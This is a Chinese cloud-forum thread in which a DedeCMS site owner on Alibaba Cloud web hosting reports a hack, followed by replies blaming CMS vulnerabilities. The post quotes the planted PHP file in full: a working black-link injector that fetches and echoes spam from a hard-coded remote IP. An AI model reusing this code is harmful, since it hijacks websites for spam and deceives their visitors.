开发者社区> 问答> 正文

弹性Web托管-阿里云我真的很无奈


aly弹性Web托管自己宣传什么最安全,看了n多的广告,就购买了一个小空间,费力的把备案也搬到了阿里,站点也安装了,不知各位站长用的是什么站点程序,我用了dedecms5.7的网站程序,但不知为何?没2个月,一个站全是<?php
set_time_limit(0);


header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_server = "http://103.213.248.228/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);


echo $Content_mb;


?>这样的文件黑链。反应了说站点程序有漏洞,好有漏洞用最新的 DedeCMS_V57_GBK_SP1   安装,一晚上又是看截图,aly最基本的防护在哪里?



展开
收起
雅敏糕点 2016-10-01 08:32:27 10138 0
7 条回答
写回答
取消 提交回答
  • 推荐回答:

    弹性Web托管貌似下线了,可以参考下Web应用托管服务

    官方帮助文档地址:阿里云帮助中心

    更多参考: 阿里云官方(新用户需官网注册查看)

    2021-12-03 23:17:49
    赞同 展开评论 打赏
  • 最佳回答

    弹性Web托管貌似下线了,可以参考下Web应用托管服务

    更多参考地址阿里云官方(新用户需官网注册查看)

    2020-09-01 21:07:53
    赞同 展开评论 打赏
  • 专注云计算

    弹性Web托管貌似下线了,可以参考下Web应用托管服务

    2020-06-12 08:45:17
    赞同 1 展开评论 打赏
  • Re弹性Web托管-阿里云我真的很无奈
    dedecms   漏洞之王!!!
    2017-06-29 17:29:54
    赞同 展开评论 打赏
  • Re弹性Web托管-阿里云我真的很无奈
    非常同情,我正在投诉,半年入侵两次,阿里云的客服还不承认是从主机入侵的。
    2017-06-29 15:20:03
    赞同 展开评论 打赏
  • DedeCMS 漏洞本来就多 而且楼主程序里面 可能还有后门  要清理起来不容易
    2016-10-03 07:00:28
    赞同 展开评论 打赏
  • 旺旺:nectar2。
    楼主您好,

    抱歉给您带来不便。

    如果阿里云的弹性Web托管环境有问题,那可能影响是全部的弹性Web托管用户,影响会很大,很大的。

    所以,个人建议还是重新检查一下您的网站程序。如除了dedecms,还有其它的cms您可以试试,如蝉知cms。
    2016-10-01 09:40:24
    赞同 展开评论 打赏
滑动查看更多
问答排行榜
最热
最新

相关电子书

更多
Web应用系统性能优化 立即下载
高性能Web架构之缓存体系 立即下载
PWA:移动Web的现在与未来 立即下载